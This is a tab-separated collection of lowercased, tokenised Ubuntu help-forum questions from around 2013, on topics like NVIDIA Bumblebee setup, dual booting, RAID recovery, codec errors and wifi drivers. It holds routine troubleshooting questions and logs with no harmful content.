348612	ubuntu 13.04 : steam , dualshock3	i want ubuntu to recognize my ps3 dualshock3 controller so i can use it with my steam games . how can i do this ? keep in mind i 'm very new to ubuntu . thank you !
348614	bumblebee on ubuntu 13.04 with geforce 750m and driver 319	here is my story : - ) i would like to get bumblebee running with a nvidia® geforce® gt 750m and it does not work . basically optirun says failed to initialize the nvidia gpu . i tried many things suggested in here ending in a complete broke x server and unity after using nvidia-xconfig . after a night of debuging my system runs again ( i had to reinstall ubuntu-desktop package ) , but something with the onboard intel chip is now broke too : before i hat 60 fps at glxspheres ( running on the intel chip ) , now its 25fps . because gt 750m is not supported in 304 , i installed the 319/325 driver and bumblebee as described here : using nvidia 319 with bumblebee ( ppa : xorg-edgers/ppa ) in the following i try to post as much usefull information as possible : system : details : http : //www.asus.com/notebooks_ultrabooks/n550jv/ # specifications processor : intel® core™ i7 4700hq processor memory : ddr3l 1600 mhz sdram , dimm 8g graphic onboard : integrated intel® hd graphics 4600 and graphic nvidia : nvidia®geforce® gt 750m with 2gb ddr3 vram kernel : 3.8.0-30-generic os : ubuntu 13.04 x64 optirun -- debug glxspheres [ 36773.371123 ] [ debug ] optirun version 3.2.1 starting ... [ 36773.371185 ] [ debug ] active configuration : [ 36773.371198 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 36773.371211 ] [ debug ] x display : :8 [ 36773.371223 ] [ debug ] ld_library_path : /usr/lib/nvidia-325 : /usr/lib32/nvidia-325 [ 36773.371236 ] [ debug ] socket path : /var/run/bumblebee.socket [ 36773.371248 ] [ debug ] accel/display bridge : auto [ 36773.371260 ] [ debug ] vgl compression : proxy [ 36773.371273 ] [ debug ] vglrun extra options : [ 36773.371285 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 36773.371349 ] [ debug ] using auto-detected bridge virtualgl [ 36773.411550 ] [ info ] response : no - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 36773.411588 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 36773.411593 ] [ debug ] socket closed . [ 36773.411613 ] [ error ] aborting because fallback start is disabled . [ 36773.411620 ] [ debug ] killing allremaining processes . dpkg -l|grep nvidia ii bumblebee-nvidia 3.2.1-1~raringppa3 amd64 nvidia optimus support using the proprietary nvidia driver rc nvidia-304 304.108-0ubuntu1~xedgers~raring1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-319 325.15-0ubuntu1~xedgers~raring2 amd64 transitional package for nvidia-319 ii nvidia-325 325.15-0ubuntu1~xedgers~raring2 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-persistenced 325.15-0ubuntu1~xedgers~raring1 amd64 load the nvidia kernel driver and create device files ii nvidia-settings-319 325.15-0ubuntu1~xedgers~raring2 amd64 transitional package for nvidia-settings-319 ii nvidia-settings-325 325.15-0ubuntu1~xedgers~raring2 amd64 tool for configuring the nvidia graphics driver lspci -k | grep nvidia kernel driver in use : nvidia grep -fn ' ( ee ' /var/log/xorg.8.log 15 : ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . 117 : [ 36773.400 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) 158 : [ 36773.409 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please 159 : [ 36773.409 ] ( ee ) nvidia ( 0 ) : check your system 's kernel log for additional error 160 : [ 36773.409 ] ( ee ) nvidia ( 0 ) : messages and refer to chapter 8 : common problems in the 161 : [ 36773.409 ] ( ee ) nvidia ( 0 ) : readme for additional information . 162 : [ 36773.409 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia graphics device ! 163 : [ 36773.409 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 168 : [ 36773.409 ] ( ee ) screen ( s ) found , but none have a usable configuration . 172 : [ 36773.409 ] ( ee ) 176 : [ 36773.409 ] ( ee ) please also check the log file at `` /var/log/xorg.8.log '' for additional information . 177 : [ 36773.409 ] ( ee ) kern.log sep 22 09:39:34 talorion-n550jv kernel : [ 37308.550024 ] vgaarb : this pci device is not a vga device sep 22 09:39:34 talorion-n550jv kernel : [ 37308.550406 ] nvidia 0000:01:00.0 : irq 50 for msi/msi-x sep 22 09:39:34 talorion-n550jv kernel : [ 37308.563424 ] nvrm : failed to copy vbios to system memory . sep 22 09:39:34 talorion-n550jv kernel : [ 37308.571915 ] nvrm : rminitadapter failed ! ( 0x30:0xffffffff:720 ) sep 22 09:39:34 talorion-n550jv kernel : [ 37308.571923 ] nvrm : rm_init_adapter ( 0 ) failed bumblebee.conf keepunusedxserver=false xorgconfdir=/etc/bumblebee/xorg.conf.d [ bumblebeed ] virtualdisplay=:8 keepunusedxserver=false servergroup=bumblebee turncardoffatexit=false noecomodeoverride=false driver=nvidia [ optirun ] bridge=auto vgltransport=proxy primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus allowfallbacktoigc=false [ driver-nvidia ] kerneldriver=nvidia-319 pmmethod=auto librarypath=/usr/lib/nvidia-319 : /usr/lib32/nvidia-319 xorgmodulepath=/usr/lib/nvidia-319/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau here are my question ( s ) : how can i go back to my graphical system working as it did right after the installation of ubuntu ? how can i get bublebee run on mys system ( or what exactly did i wrong ) ? thank you very much for any help . gregor -- -update/edit -- - after the suggestions of lupopa i installed 12.04 sucessuflly . the problem now is that nvidia prime is not working . why it is not working is decribed here : how well do laptops with nvidia optimus work ? . so i think i have to stick with bumblebee wich is still not working : - )
348615	movie codec install errors	trying to play clip downloaded from youtube and i keep getting this error when i try to install the required codec . please help the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.4 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.4 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed
348617	sony vaio can not disable second graphics card - notebook runs hot and loud	i just installed xubuntu on my sister 's sony vaio vgn-nw250f and noticed that it runs a bit hot and loud . after looking around i realized it is because of the build in second graphics card , that is apparently not turned off here is the relevant lspci output : 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710/m92 [ mobility radeon hd 4530/4570/545v ] here is the xorg log : http : //pastebin.com/atv3mjq2 i tried to turn off the second card according to the hybrid graphics article ( https : //help.ubuntu.com/community/hybridgraphics ) , but i ca n't find vga_switcheroo in /sys/kernel/debug/ despite the fact that grep -i switcheroo /boot/config-* reutrns the following : /boot/config-3.8.0-19-generic : config_vga_switcheroo=y /boot/config-3.8.0-30-generic : config_vga_switcheroo=y i thought it might be the prbolem because of modesetting was disabled , but i could not find the grub boot config file ( i use gentoo only and there it is located in /boot/grub/grub.conf ) she does not want to use it for gaming so i just want to disable the ati card for the moment .
348620	installing on existing devices	can i install your system on my mobile and/or tablet ? and how ? ? i think it will be more better if you can provide this features it will help to spread the system in short time thanks
348625	ubuntu 13.04 firefox proxy authentication delays	we are using a proxy server in my company . my proxy settings are ok and normally i can access internet using our proxy server . only firefox and thunderbird are acting very weird . when i try to access to a web site , firefox or thunderbird is freezing for 20 seconds and then i can access to that webpage . it 's the same for all the webpages which i want to access . it 's freezing for 20 seconds and then functining normally . it seems like it 's trying to authenticate with my proxy server and it really takes time to do that . here the things i 've already tried ; firefox proxy setting has been done i 've edited /etc/apt/apt.conf file any idea why it 's really that slow ? thanks .
348629	install xubuntu alongside windows	i chose to install xubuntu with windows , using the link . my operating system , is windows xp professional , 32 bit . everything worked fine , until the file coping step , during installation . it stopped after copying about 60 % in the boot section . the hd space is not a problem , as it has still plenty left . did anybody experienced a similar malfunction ? any solutions ? if iâ´m copying this xubuntu 12.04 on a bootable usb-stick and install it in a separate partition , would this work ? or would it be better to get another download .
348635	broadcom wifi 4365 not working in ubuntu 12.04.3 : kernel 3.8.0-29-generic	now i have tried diffrent things like 12.04 does not detect wlan0 ( broadcom 4365 ) how to get my broadcom 4365 wifi adapter working ? ubuntu 13.04 does not recognize wireless adapter ( 14e4:4365 ) broadcom 4365 wireless driver with 3.4 / 3.5 kernel and so on.. nothing seems to be working or may i be too stupid to follow them wrongly . so need some generous help : ) network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) 3.8.0-29-generic
348637	using curl on my ubuntu 13.04 in an attempt to connect to win & web service	i am issuing the following on my ubuntu in an attempt to connect to a webservice on a win 7 machine on my intranet . curl http : //192.168.0.10/ciswebservice and the error i get is : - curl : ( 7 ) failed connect to 192.168.0.10:80 ; connection timed out however a ping to that pc works fine . am i doing something wrong or is the webservice at fault ?
348639	appropriate kernel for lenovo	i use a virtual pc with windows 8 . my computer has a core i3 processor . i would like to install ubuntu , but i 've unable so far . i have searched in google and still can not fix . the error msg is : 'unable to boot - please use a kernel appropriate for your cpu . '
348643	data backup to install ubuntu	i am currently using windows 8 on my laptop . i used to have a desktop with windows xp on it but somehow it 's not booting up . i have an internal hdd on the desktop which contains lots of free space . i want to install ubuntu 13.04 on my laptop completely replacing windows 8 , but before that i want to backup all my data to that hdd . can i connect the hdd with esata- > sata cable ? ( laptop has esata+usb port ) . am i going to provide additional power to hdd ? my smps is working and i can power my hdd with cable inside desktop . i am a newbie . plz help . thanks in advance .
348645	fn brightness keys only has 3 steps on laptop with nvidia optimus	first , i 'm a noob at linux . i 've tried about everything to fix this but nothing seems to work . my fn keys for the backlight only has 3 steps - either its maximum , medium or minumum . ls /sys/class/backlight returns acer-wmi intel_backlight when i 'm using acpi_backlight=vendor ( with this option the brightness does not change at all ) echo 5 | sudo tee /sys/class/backlight/acer_wmi/brightness not working echo 5 | sudo tee /sys/class/backlight/intel_backlight/brightness working and acpi_video0 acpi_video1 intel_backlight when nothing is changed in grub config . echo 5 | sudo tee /sys/class/backlight/acpi_video0/brightness working echo 5 | sudo tee /sys/class/backlight/acpi_video1/brightness not working echo 5 | sudo tee /sys/class/backlight/intel_backlight/brightness working i 'm guessing that there is multiple handlers for this which is changing the brighness . this problem is on every distro i 've installed . things i 've tried and places i 've been.. : http : //ubuntuforums.org/showthread.php ? t=1866283 & page=2 https : //bbs.archlinux.org/viewtopic.php ? id=137164 why does my thinkpad brightness control skip steps ? ( same as this guy , killall gnome-settings-daemon gives more steps ) and much more with similar solutions ( mostly acpi_osi=linux acpi_backlight=vendor/legacy ) i 'm close to giving up , so any solutions are welcome .
348646	translate an existing app	i want to translate an existing app for educational purposes from english into dutch . can i use this toolbox to do that ? regards peter vis
348647	unable to seed after completing torrent download	hello ! i 'm new to ubuntu 12.04 and i love it ! so , i 'm sorry for my lack of knowledge , but i 'm eager to learn . i 'm using qbittorrent . everything works fine , but after i complete a download - i ca n't seed anymore . i know there are a lot of peers , but they ca n't connect to me . i have enabled firewall through gufw - default settings ( deny incoming , allow outgoing ) , but i had this problem before that . i have n't changed much in qbittorrent settings ( i have changed the location of default download folder , set global maximum connections to 1000 and maximum number of connections per torrent to 1000 ) . any ideas about what 's wrong ? please help ! thank you ! p.s . i have tried transmission and deluge - same problem . bob
348649	can i change the folders synced on ubuntu 1 for windows ?	i synced the my documents folder when i set up ubuntu one but i would like to be more selective in what i sync , can this be done ? i do n't see any options for this in the web interface .
348650	ubuntu downloads slow	i have a problem with ubuntu 13.04 , when i want to download something in direct download , i have n't tried torrent but i do n't want such solution , is there a way to download the files faster without using any software for that task ? i mean : setting up something in the software . all i find are programs . i have already changed the dns using namebench , but still i download slow . thank you
348652	laptop `` do nothing '' does not work	i 've just installed 12.04 on my laptop . at home , i use an external monitor and keyboard and would like to close the lid on my laptop . in settings under power , i 've selected `` do nothing '' for when the lid is closed , for both 'on battery ' and 'plugged in ' , but the computer suspends every time . what do i need to do to work with the lid closed ?
348654	how to install g++ compiler ?	i have tried the following : sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but when i compile the terminal shows the following : g++ hello.cpp -o hello the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > what should i do ?
348658	what package is '/usr/sbin/apache2 ' part of ?	after i installed apache trough the command sequence you can find below , it gave me an error : /usr/sbin/apache2ctl : 171 : /usr/sbin/apache2ctl : /usr/sbin/apache2 : not found . after some googling i found out that it 's part of a dependency of apache2 , which apparently is missing . does anyone know which dependency that is ? command sequence : sudo apt-get install apache2.2-common sudo apt-get install apache2 sudo apache2ctl start -k after some more googling i figured i should try sudo service apache2 start which gives me the error : no apache mpm package installed . i tried to install that package by using the command sudo apt-get install apache2-mpm-prefork . i posted the results of that here . reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : apache2-mpm-worker the following new packages will be installed : apache2-mpm-prefork 0 upgraded , 1 newly installed , 1 to remove and 0 not upgraded . need to get 0 b/2.398 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : apache2-mpm-worker : dependency problems , but removing anyway as you requested : apache2 depends on apache2-mpm-worker ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-prefork ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-event ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-itk ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2-mpm-worker is to be removed . package apache2-mpm-prefork is not installed . package apache2-mpm-event is not installed . package apache2-mpm-itk is not installed . ( reading database ... 267257 files and directories currently installed . ) removing apache2-mpm-worker ... no apache mpm package installed selecting previously unselected package apache2-mpm-prefork . ( reading database ... 267251 files and directories currently installed . ) unpacking apache2-mpm-prefork ( from ... /apache2-mpm-prefork_2.2.22-1ubuntu1.4_amd64.deb ) ... setting up apache2-mpm-prefork ( 2.2.22-1ubuntu1.4 ) ... no apache mpm package installed
348659	how do i fix dual boot startup for ubuntu installation on windows 8 laptop	i have a lenovo laptop with preinstalled windows 8 64bit- i attempted installation of ubuntu 13.04 - however after installation i was faced with the grub loader . from the grub loader if i try to start up the windows loader option it would n't load windows 8 and instead show me an efi file missing error . alternatively if i restart the laptop and click f12 key i get to the bootloader screen where i can choose to boot either : ubuntu windows boot manager efi dvd/cd rom efi usb this is the only way i can choose to enter into either windows or ubuntu plus after installing ubuntu i 've noticed that i now have a new unrecognised file format partition on windows 8 - i 'm assuming its the ubuntu partition . the question is that how can i set up a dual boot screen that actually works here so i can choose to boot either windows 8 or ubuntu ?
348662	random mouse problems	after reinstalling my computer with a dual boot of windows and ubuntu the first thing i noticed was that when using ubuntu , my mouse would sometimes go spastic the pointer zips across the screen horizontally faster then i 'd be able to do by hand . perhaps becoming over sensitive ? the other problem related is that if the mouse pointer happens to go spastic in a horizontal line with a icon in the launcher it might automatically click without me clicking , thus opening programs 10 or 20 times , or if the pointer is in a horizontal line with the exit button of an already open program there 's a high risk it 'd close the program . the only fix that i found to this problem so far is restarting the computer . sometimes it works , sometimes it does n't . i'v tried looking up solutions but have had no luck so as a last resort i'v come here . any help would be appreciated . thanks in advance .
348663	[ fixed ] ubuntu touch - adb can not find the device ( nexus 10 )	first of i want to say that i have read similar questions and answers but none of them worked . when i want to acess my nexus 10 over adb root or any other adb command it does not find a device ( i tried it in ubuntu and in the bootloader ) . using ubuntu 13.04 on my pc and already used that pc to flash ubuntu touch .
348666	is grep syntax different from regex ?	i want to extract name of removed packages from here `` cat /var/log/dpkg.log | grep 'remove ' '' 2013-09-09 15:57:34 remove activity-log-manager : i386 0.9.4-0ubuntu6.2 < none > 2013-09-09 15:57:35 remove activity-log-manager-control-center : i386 0.9.4-0ubuntu6.2 < none > 2013-09-09 15:57:38 remove alacarte : all 3.6.1-0ubuntu3 < none > 2013-09-09 15:57:41 remove deepin-software-center : all 2.1.2.1~precise~noobslab.com < none > i want to grab only name of the packages between remove and colon after package name . i am not a regex expert , i made a regex expression that seems to do the job but when i want to apply it with grep nothing happens . here is working regex pattern in regex evaluators ( ? < =remove ) ( .* ? ) ( ? = : ) but this is not working : cat /var/log/dpkg.log | grep 'remove ' | grep ' ( ? < =remove ) ( .* ? ) ( ? = : ) ' what am i missing here ?
348667	ubuntu 12.04 - media server for itunes / iphone / vlc / audio & video & photos	which upnp media server running on ubuntu server 12.04 can do the following things : stream movies to the iphone vlc.app or gplayer.app stream music to iphone over the internet stream music to itunes over lan i have vlc on my iphone and gplayer and it would be great to stream movies from the ubuntu server 12.04 to the iphone . qnap has this build in ; it can stream movies and music over the internet to the qnap mobile app . has anyone experience in this one ?
348668	adding an existing partition	i have a 1tb hdd partitioned 100gb and 900gb.. i have ubuntu server 12.04.3 installed as a vm in virtualbox on a windows 7 platform on the 100gb partition with 50gb allocated to the vm . is there any way i can add the 900gb partition to the ubuntu server ? i 'm new to ubuntu or even networking for that matter but i 'm trying to host websites on this server and i would like my websites to be on the 900gb partition . i 'm also using webmin if it 's any help to this question . really appreciate some help . thanks .
348671	how to use i18n.tr in ubuntu touch projects	i have been using i18n.tr for a while in my ubuntu-touch projects . i know what this function is about but i do n't know how to add a translation to my project . where do i have to place my translation file ? with what name ? how must its content be written ? how should i connect it with my app ? how do i test it with qmlscene ?
348675	no display after boot . if i connect external monitor , things work fine	i just installed ubuntu 13.04 on my new laptop after connecting external monitor . reason being , display was becoming too faded on laptop screen if i do n't attach external monitor . screen is working fine with freedos that came installed on the new laptop though . ubuntu installed successfully . things work fine if i keep external monitor connected . but if i restart the laptop after disconnecting the monitor , no display on laptop screen . any help would be appreciated . thanks in advance .
348681	svn `` not a working copy ''	ok ... so i wanted to upload something to an svn server . how hard can that be ? well , turns out i 've been using windumb for too long . first i am supposed to `` clone '' the folder to my computer , using svn co -- username username url alright , so i cd ~/ ... /0.svn svn co -- username username url and get an svn : options from url : 200 ok. next , i create a folder ~/ ... /0.svn/somefolder , put some files into that folder and want to add it so i can commit it . svn add somefolder and now it 's giving me an `` . '' is not a working copy and i have no idea what 's going wrong because i 'm basically doing exactly what the instructions i was given are saying .
348682	ca n't ping kvm guest from another computer	i 've set up several kvm guest oss on my thinkpad laptop . these guests are all on the 192.168.122.0/24 subnet , while the host os are in the subnet 192.168.1.0/24 together with another laptop ( dell ) of mine . iptables on all guest oss are turned off , so i can ping from the host to all the guests ( and vice versa ) on thinkpad , and i have also added a static route to my router : destination network : 192.168.122.0 , mask : 255.255.255.0 , gateway : 192.168.1.112 ( my thinkpad host 's primary adapter address ) . having done all this , although i can ping my thinkpad host ( 192.168.1.112 ) and 192.168.122.1 from dell , but can not ping any guest os ( which has ip addresses like 192.168.122.11 ) , for error messages i got this : [ root @ localhost jerry ] # ping 192.168.122.11 ping 192.168.122.11 ( 192.168.122.11 ) 56 ( 84 ) bytes of data from 192.168.1.1 : icmp_seq=1 redirect host ( new nexthop : 192.168.1.112 ) from 192.168.1.112 icmp_seq=1 destination port unreachable from 192.168.1.112 icmp_seq=2 destination port unreachable please let me know what might be wrong about my settings ...
348683	is there an fsck command for checking the entire hdd ?	this is probably a duplicate , but then please just link the post that answer my question . fsck seems to check partitions and file system , but is there a way to use a live cd , unmount ( well , i guess the hdd wont be mounted anyway ) the entire disc and have it checked for errors and bad sectors ? would fsck -n /dec/sda work ? sda is the name of the entire hdd in my case , obviously .
348685	fritz ! wlan stick n on 12.04 lts	i do n't know much about linux ... so that i 've no idea what to do now . i have been installing ubuntu x32 on my windows x64 pc ( bootmgr errors appeared but ( do n't ask how ) i solved the problems ) . i tried to connect to my wlan-router through my wlan stick ( fritz ! wlan stick n v2 ) but it does n't even recognize it . after spending hours on searching for a step-by-step tutorial i came to the conclusion that i should ask you . what should i do now ? any help is appreciated
348686	startup jobs exec at	i discovered upstart jobs , not much on stackoverflw and google , seems pretty new , but i can not get 1 line to work : exec /usr/bin/echo `` reboot '' | /usr/bin/at 06:00 tomorrow the line next to this line works fine , at -l shows nothing . how do i do it ?
348687	how to reinstall ubuntu with a fresh start without removing files ?	i want to have a fresh ubuntu start , with everything being default . but i do n't want to lose files , i have lots of movies , documents etc . i do n't want to remove , and i ca n't backup them , because they take too much space . is it possible ?
348689	ubuntu phone vs ubuntu for android	what is the difference between ubuntu phone and ubuntu for android ?
348693	how do i disable kernel messages while booting ?	i enabled the kernel messages a long time ago because i was playing around with ubuntu . but now i am finished and i want to disable them again , but forgot how to . /etc/default/grub already contains the line : # grub_terminal=console ( including the hash which diables it ) .
348697	ubuntu 12.04 raid wont assemble after move to new pc	alright , so i swapped the system board out on my server running ubuntu 12.04 . the os is on its own drive , and then i have 1 storage drive , and 3 drives in a raid 5 . well , when booting up with the new board , i get a raid failed error and it drops me to a busybox shell , no matter if i choose yes or no at the boot degraded raid screen , it drops me to shell . i can then exit and get to ubuntu . running : fdisk -l shows me that all drives are seen fine , but if i try to run mdadm -- assemble -- scan nothing happens , if i manually specify the drives with mdadm -- assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sde1 then i get several errors , first sda1 is busy , then no superblock found on sdb1 , then it aborts . running mdadm -- examine /dev/sd* shows that sda looks good , shows the raid details , knows its a 3 device raid 5 , looks great ... sdb and sde however show no md superblock detected ... can anyone help me out here ? i have a lot of data on these drives that i really do n't want to lose ... i tried to research this before hand and all forums said it was really easy , just run mdadm -- assemble -- scan and you are done ... yeah that didnt work , so please , any help would be appreciated . thanks .
348700	how can i uninstall brackets and sublime text 2 from ubuntu 13.04 ?	how can i uninstall brackets and sublime text 2 from ubuntu 13.04 ?
348702	juju can not reach servers	i installed maas server and juju client tools , but when i try to run any deploy command or run juju status i get these error messages : please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no reachable servers . error : unable to connect to environment `` maas '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no reachable servers when i run juju bootstrap again i get this error : environment is already bootstrapped
348704	will ubuntu software center function in raspbian os ?	can i install ubuntu software center in raspbian ? will it work properly ? will proprietary apps work properly ?
348706	problem booting windows 8	i first installed ubuntu and then i removed it and wanted to install it again . so , this time , i saw there were a number of partitions already there , so i deleted all except the drives i had my data in . then i made a partition for ubuntu and installed it , but now i am unable to boot windows 8 , which was already there . i think i deleted the partition for grub also . kindly suggest to me what to do . even uefi settings is not showing any option for either windows nor ubuntu . i have now downloaded boot-repair and am able to boot ubuntu but not windows . please give advice .
348708	booting from usb stick	i have created a bootable usb stick ( usb2/4gb ) using the instructions at http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows . using 12.0.4 on 32bit laptop . all seems to work , no errors . but when i then boot from this on a laptop , i get the ubuntu logo , lots of output and then errors such as usb 1-3 : device descriptor read/64 , error -110 reset high-speed usb device number 3 using ehci-pci device not accepting address , error -110 and finally unable to enumerate usb device on port 1 after this i can press enter and get a initramfs shell . i can then shutdown using a long press on power button . the shutdown command is not part of this shell . so i am guessing that the stick is working otherwise i would not get this far though there may be corruption in the files ( ? ) . no other usb ports being used though touchpad/keyboard may be usb . i have googled this and the only answer seems to be shutting down , removing the power cord ( and in my case the battery ) for 5 minutes and trying again . this has not worked . i did get this working a few years back with the same usb stick ( since reformatted ) on a different laptop . this laptop is a thinkpad t61 . any ideas what i have done wrong ? just to add the first line of output where it starts to go wrong is [ initramfs ] unable to find a medium containing a live file system just compared checksum with what i downloaded and they are the same . i downloaded ubuntu-12.04.3-desktop-i386.iso regards , john
348709	ubuntu workspace problem	something changed in my ubuntu setup . now most applications are starting up in workspace 2 , instead of the active workspace 1 . i tried to fix this by changing my settings to choose only 1 ( not 4 ) workspaces . that did not work , actually made it worse . now the applications are still opening in workspace 2 including their dialog boxes , but i do n't have access to workspace 2 so i am totally locked out . i have the compizconfig application , but as it starts in workspace 2 , i am locked out .
348711	how to give a program access to make file in root directory	i am running a program which uses log4j.the log4j uses rolling file appender.however its not able to create the file . i guess its because the creation of file need root access . the program is running in folder /usr/src/hell0/myprogram and the log file needs to be stored in /usr/src/logfiles/myprogram.log . but its not storing it there instead its putting everything to system out
348712	there are no interfaces on which a capture can be done	i 'm using ubuntu 13.04 but wireshark wo n't show me any logs , wo n't function at all i 'm connected to my wifi , belkin router .
348713	help me i cant do updates with these two errors : (	these are the two errors : http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/dists/raring/main/binary-amd64/packages http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/dists/raring/main/binary-i386/packages i need help removing them please help i want to check for updates ubuntu 13.04 it still goes through but i want to get rid of them
348714	ubuntu touch apt-get install ( openssh-server ) error	whenever i try to run apt-get install openssh-server i get the following errors : root @ ubuntu-phablet : /home/hablet # apt-get install openssh-server w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt e : the package lists or status file could not be parsed or opened .
348717	ubuntu data recovery help	recently i have install ubuntu 13.04 removing windows 7 . before installing ubuntu in win 7 there are 5 partition storing my important data but after installing ubuntu all partition merged into single one and delete my all earlier data but i want to get back my those all data please give me useful information to help
348720	ubuntu server on vaio vgn-fw11e fan troubles	okay , there are several postings to this topic but they are not answering my problem . i installed ubuntu server 12.04 on my laptop without gui . i checked cpu governor which is ondemand and keeps the 2,7 cpu on 800mhz so that works good . the fan is always on f端ll power . so i think it will be caused by the radeon card . but how can i install the driver without installing x ? ? goal is to set the power saving of the radeon hd 3470 to max . so the fan keeps quiet .
348721	how to change panels font color in gnome-classic ?	i 'm using gnome-session-fallback on quantal . i recently installed the moka theme . love it , but the panel font color is almost the same as the background color . i tried adding a css rule to /usr/share/themes/moka/gtk-3.0/apps/fallback-panel.css : panelapplet * { color : # ffffff ; } that works but also applies to the panel applets menus , which makes them barely usable . hence i 'm looking for the proper css selector .
348725	creating a bootable dvd disk with windows	i want to install windows 7 from ubuntu . i know it 's tricky but nonetheless i need it . how do i create a bootable dvd disk with windows then ?
348727	why are all the prefences greyed out when trying to edit a terminal profile ?	i ca n't edit a terminal profile . ca n't edit the default one , and ca n't edit the new one when i make a new one . all the options are greyed out . anyone know whey they would be ? i used to be able to do this , but since the last upgrade , it 's not able to .
348730	purchase free app without registration	i 'm trying to install the free viewer app fragment ... this is the first time the ubuntu software center displayed a `` buy '' button instead of an `` install '' button . the license info that came up stated that free apps did not require registration , but after i 'd acknowledged it , there seems to be no way to proceed without doing so .
348732	ubuntu 13.04 intel/amd radaeon hd8770m problem	i just installed ubuntu 13.04 on a samsung laptop ( ativ book 8 ) and i 'm having some problems getting it to use the amd graphics card . it 's a dedicated card but ubuntu keeps wanting to use the intel graphics instead of the amd and when i installed the ati drivers and run aticonfig i 'm getting no adapters found
348735	how to upgrade using terminal	how can i upgrade my existing ubuntu 12.04 to 13.04 using terminal ... please help me with the procedure . i am having problem regarding upgrade .
348736	qt5 opens multiple window	i recently installed qt5 and ubuntu sdk and i use 13.04 . in welcome section when i click develop , example or tutorial tabs multiple windows open up and i am unable to close it . how do i fix this . i checked this page but is of no use
